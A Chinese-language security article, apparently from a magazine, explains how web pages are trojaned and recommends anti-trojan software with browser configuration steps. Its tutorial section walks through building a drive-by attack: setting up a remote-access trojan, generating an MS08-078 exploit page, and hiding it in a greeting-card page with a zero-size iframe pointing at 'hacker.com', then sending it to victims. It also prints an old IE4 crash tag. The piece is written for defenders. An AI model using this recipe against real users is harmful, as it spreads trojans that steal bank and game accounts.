網絡掛馬， 在網絡安全界中一直是一個長熱不衰的話題， 我們遍尋坊間的網絡安全工程師和網絡安全高手， 想探尋網絡掛馬為什么總會保持有如此的熱度。 得到的答案直接而干脆， 黑客想將自己的木馬病毒傳播給特定人群或者最廣泛的特定人群時， 所能夠用到的方法只有網絡掛馬這一種， 這也是為什么時至今日， 網絡掛馬都在一刻不停的每天上演。

    黎塞留在《政治遺囑》中說：“正如同總不帶武器的使命易于遭到災禍一樣， 一個國家如果不時刻準備就會有許多恐懼”。 對于一個網絡安全工程師而言， 網絡掛馬正是他們需要準備的， 消除黑客威脅的核心知識。 網絡掛馬不僅是黑客抓取肉雞的主要方式， 往往也會對缺乏防范的網站和服務器構成巨大威脅， 讓受害服務器成為病毒的源頭， 因此在新年伊始， 我們將網絡掛馬列為了網絡安全工程師首先需要掌握的基礎知識之一， 系統為大家介紹。

    銳甲團隊惡意代碼分析員藍海：從事網絡安全行業近8年， 資深安全工程師， **發現多個軟件漏洞

進入互聯網時代之后， 病毒改變了以前主要依靠可執行文件傳播的方式， 開始通過電子郵件、軟件漏洞、內網攻擊、網頁掛馬等多種方式傳播， 將病毒傳播的途徑變得五花八門。 不過在眾多的傳播方式中， 黑客們仍然喜歡選用網頁掛馬， 網頁掛馬不僅僅能夠借刀殺人， 借助用戶信任的網站， 讓網絡用戶在不知不覺中中招。

    而且隨著近年來IE等瀏覽器的漏洞不斷被發現， 網頁掛馬的方法也越來越多， 成功幾率越來越高， 傳播范圍也越來越廣。 不僅如此， 可供黑客選擇的“掛馬套餐”足有上千種之多。 因此， 網頁掛馬成為了黑客傳播病毒的主要手段， 也成為了網絡安全工程師在維護Web服務器和大型網絡時必須具備的基礎技能。

    網絡掛馬攻擊的危害性也很大， 通常黑客選擇網頁掛馬手段傳播的病毒， 幾乎均為盜竊銀行賬號、網游賬號， 或者用戶私密文檔文件的木馬型病毒， 比起單純的中病毒丟失數據的電腦用戶， 這部分被網頁掛馬攻擊的用戶損失更多的是真金白銀的游戲裝備和銀行卡中的現金。

    網頁掛馬緣起

    互聯網興起之后， 通過網站向訪問者傳播植入病毒的手段就隨之出現了。 國內大多數網民最早接觸的網頁病毒攻擊來自著名的Windows 98 IE4.0瀏覽器中的一個漏洞， 這個漏洞可以說最早揭開了國內黑客通過網頁發動攻擊的熱潮。

    該漏洞的利用方式非常簡單， 如同現在許多圖片木馬一樣， 只需要在HTML文件中寫入<img class='lazy' data-original=c:\con\con>這段HTML代碼， 凡是Windows 98 IE4.0的用戶此時再瀏覽打開包含這段代碼的HTML文件， 就會出現藍屏死機現象。 由于才做簡單， 這種惡作劇式的網頁攻擊方法當年風靡一時， 導致眾多網友在單擊陌生鏈接時唯恐藍屏。

    其實出現網絡掛馬這種現象， 可以說是瀏覽器在一出生時就命中注定的， 用戶在瀏覽網頁時， 所看到的最終網頁都是通過網絡將服務器中的數據下載到自己的電腦中后再有瀏覽器解釋生成的最終結果， 因此網頁中包含的各種代碼就存在被黑客惡意構造的風險， 很容易造成漏洞。

    特別是當年的瀏覽器鼻祖Netscape網景公司在推出JavaScript語言時， 設計人員就意識到如果允許網絡服務器將可執行程序代碼傳遞給用戶的瀏覽器解釋， 很可能造成網絡安全上的風險。 其中最主要的風險莫過于不懷好意的網站會通過惡意代碼竊取用戶正在瀏覽的其它網站的秘密信息。 雖然最后網景公司采用了各種限制手段， 保證了JavaScript安全性， 但是這種安全性也并不是絕對的， 黑客最終還是能夠通過各種網絡機制中的弱點， 和網頁代碼的漏洞， 巧妙的盜取用戶的機密信息， 配合各種漏洞對網頁用戶發動攻擊， 這其中就包括網頁掛馬。 網頁掛馬原理揭秘

    網頁掛馬到如今已經發展出許多方法與應用手段， 從IFRAME框架， 到利用JS文件調用網頁木馬， 以至于在CSS文件中插入網頁木馬， 或者偽裝成圖片， 甚至利用SWF、RM、AVI等文件的彈窗功能來打開網頁木馬， 都成為黑客經常使用的手段。 在這其中IFRAME網頁框架掛馬是黑客最多用到的經典掛馬方式， 也是最基礎的掛馬方式， 可以說沒有IFRAME， 網頁木馬中有一多半就無法實現完美的隱藏， 讓用戶在不察覺中受到攻擊。

    IFRAME是一個非常普通的HTML語言標記， 它主要用來在一個網頁界面中， 劃分出左右或者上下的框架， 就如同我們電視中的畫中畫效果一樣， IFRAME允許網頁中也出現一個框架， 用來顯示另外一個網頁。 但是IFRAME功能也被黑客巧妙的利用了， 黑客在一些看似正常的網頁中， 使用大小為0的隱藏框架， 讓用戶在沒有察覺中打開含有漏洞溢出內容的惡意網頁， 這種手法就如同在畫中畫電視中打開了一個收費頻道， 但是由于收費頻道的畫面尺寸被惡意修改成了0， 所以看電視的人并不知道自己已經打開了收費頻道， 因為他并沒有看到， 但是事實上收費頻道卻的確在播放， 而且會收扣除用戶的使用費。

    IFRAME框架掛馬實戰

    每當年景不景氣時， 黑客病毒等惡意攻擊事件就會接連不斷的出現， “黑色星期五”病毒就是最好的證明， 據說該病毒的制造者就是因為老板辭退而編寫了這樣一個貽害人間的病毒。 2008年的金融危機有讓一大批計算機工程師將無聊都發泄在了制造病毒上， 特別是2008年底， 圣誕老人送給黑客們的MS08-078漏洞， 就是一個非常好的掛馬利用方法， 下面我們就為大家演示一下如何利用軟件漏洞， 配合IFRAME標記， 進行隱藏的框架掛馬。 下面我們做過做個演示， 比如我們將保存在電腦中的Google網頁中插入如下代碼：

     <iframe src=http://blog.sina.com.cn/deyumiao width=400 height=300></iframe>

    第一步：首先準備一款得心應手的木馬， 黑客通常會首選灰鴿子和PCShare， 這兩款軟件在設置上都非常簡單， 易于操作上手。 設置好相關服務， 最后聲稱木馬所用的服務控制端

    第二步：使用FTP將木馬上傳到自己的網站空間中， 并用記事本記錄下木馬的網絡路徑。 然后在用MS08-078網頁木馬生成器， 生成一個帶有MS08-078漏洞的惡意網頁。

    第三步：找一個正常的新年賀卡網頁， 將該網頁保存到自己指定的目錄中， 然后使用Web Designer或Dreamweaver網頁編輯軟件對保存的網頁進行調整修改， 然后上傳到自己的網站空間中， 看圖片等內容是否能夠正常顯示。

    第四步：然后再一次打開修改好的賀卡網頁， 使用IFRAME標記語句， 將生成好的MS08-078網頁嵌入到賀卡網頁中， 嵌入掛馬代碼如下：

    <iframe src=http://www.hacker.com/ms08078.html width=0 height=0></iframe>

    將這段代碼插入到賀卡網頁之中后， 就完成了我們的網頁掛馬操作。 這段代碼讓正常瀏覽賀卡網頁的用戶， 在看到賀卡頁面之后， 也隨之運行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出頁面， 但是由于它的長和寬都為“0”， 觀看賀卡網站的用戶不會看到溢出頁面， 因此非常隱蔽。 此時我們的網頁掛馬頁面就完成了， 只需要將這個頁面發送給其他人， 那些沒有修補MS08-078漏洞的用戶， 就會在不知不覺中， 中黑客設定的木馬。 防范方法

    對于IFRAME標記這種利用正常HTML語言功能實現隱藏的掛馬方式， 目前并沒有好的防范方法， 因為它是正常的網頁功能。 用戶只能夠寄希望殺毒軟件和防掛馬軟件阻止利用IFRAME標記內嵌的溢出病毒網頁。

我們建議用戶在安裝殺毒軟件之后， 能夠安裝第三方防掛馬軟件作為補充， 下列就是我們測試的一些具有防掛馬功能的免費軟件。

銳甲（下載地址：http://www.araymor.com/download.html）就可以幫助你防御網頁中的木馬， 安裝后無須任何設置， 自動檢測網頁危險， 遇到掛馬、帶毒網站時會屏蔽并提示見圖， 還能自動修補漏洞。 知識目前默認只支持IE系列瀏覽器， 不過通過巧妙的設置， 還可以讓其支持更多的瀏覽器。

    實例1

    移花接木保衛遨游Maxthon

    如果你一直使用Maxthon 2.0瀏覽器， 可以通過下面的步驟讓銳甲支持Maxthon2：

第一步：將“plugin.ini.rar”（下載地址：http://work.newhua.com/cfan/200902/cj.rar， 快車代碼：CF0902CFRJ04）解壓后得到“plugin.ini”文件復制到銳甲程序安裝目錄下的“AModule”（默認位置為：C:\Program Files\ARaymor\Amodule）， 接下來再將“AModule”文件夾復制到Maxthon2.0安裝目錄下的“plugin”文件夾中， 再將其重命名為“Araymor”。

    第二步：接下來再打開Maxthon2.0安裝目錄， 找到自己的Maxthon賬號對應的文件夾（如果沒有注冊Maxthon2.0賬號， 請打開SharedAccount文件夾）并打開“Config”文件夾， 使用記事本程序打開“plugin.ini”文件， 找到[Paths]節， 直接增加：ARaymor=1， 保存并退出該文件。

    經過上面的兩步設置后重新啟動Maxthon就可以享用銳甲對網頁掛馬的防御了。

    實例2

    畫龍點睛又多倆同胞

    如果你使用的是360安全瀏覽器， 只要直接打開360安全瀏覽器的安裝目錄， 用記事本程序打開“360SE.ini”， 然后將下面的內容添加到文件末尾， 最后保存該配置文件即可：

    [PlugIn]

    {53BEAA3C-A509-49AD-ACC3-553AD20DA38B}BHO=1

    世界之窗的添加方式類似， 只需在其安裝目錄打開它的“TheWorld.ini”文件， 將右邊的內容添加進入即可。